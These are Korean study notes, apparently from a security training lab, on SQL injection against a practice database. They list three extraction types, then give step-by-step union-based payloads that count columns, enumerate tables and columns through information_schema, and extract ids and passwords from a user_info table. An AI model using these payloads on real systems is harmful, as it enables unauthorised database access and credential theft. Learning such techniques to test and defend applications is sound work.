SQL Injection
SQL Injection 데이터 추출 2가지 유형
** SQL 질의문 결과가 화면에 보이는 경우
-> Union SQL Injection
** SQL 에러가 응답에 포함되는 경우
-> Error Based SQL Injection
** SQL 질의문 결과가 화면에 안 나오는 경우
-> Blind SQL Injection
select ~ board ~ union select password from member
id : mario%' and '1%'='1
select ~~~~~~~ from ~~~~~~~~ where id like '%%'
출력
-- order by : 정렬
id : mario%' order by 6 #
select (컬럼 6개) from ~~~~~~~~ where id like '%%'
결과가 나올 때까지 정렬 수를 맞춰 나가야 함
id : mario%' union select 1,2,3,4,5,6 #
select (컬럼 6개) from ~~~~~~~~ where id like '%%'
-- 시스템 테이블
select database()
mario%' union select database(),2,3,4,5,6 #
select table_name from information_schema.tables WHERE table_schema = 'segFault_sqli'
id : mario%' union select 1,2,3,4,5,6 #
mario%' union select table_name,2,3,4,5,6 from information_schema.tables
WHERE table_schema = 'segFault_sqli' and '1%'='1
table_name 위치에 원하는 값 반환
select (컬럼 6개) from ~~~~~~~~ where id like '%mario%' union select table_name,2,3,4,5,6 from information_schema.tables
WHERE table_schema = 'segFault_sqli' and '1%'='1%'
select column_name from information_schema.columns where table_name='user_info'
id : mario%' union select 1,2,3,4,5,6 #
select (컬럼 6개) from ~~~~~~~~ where id like '%%'
mario%' union select column_name,2,3,4,5,6 from information_schema.columns where table_name='user_info'#
table name : user_info
column name : id, name, password ...
select password from user_info
id : mario%' union select id,2,3,password,5,6 from user_info #
select (컬럼 6개) from ~~~~~~~~ where id like '%mario%' union select id,2,3,password,5,6 from user_info
step 6의 데이터를 추출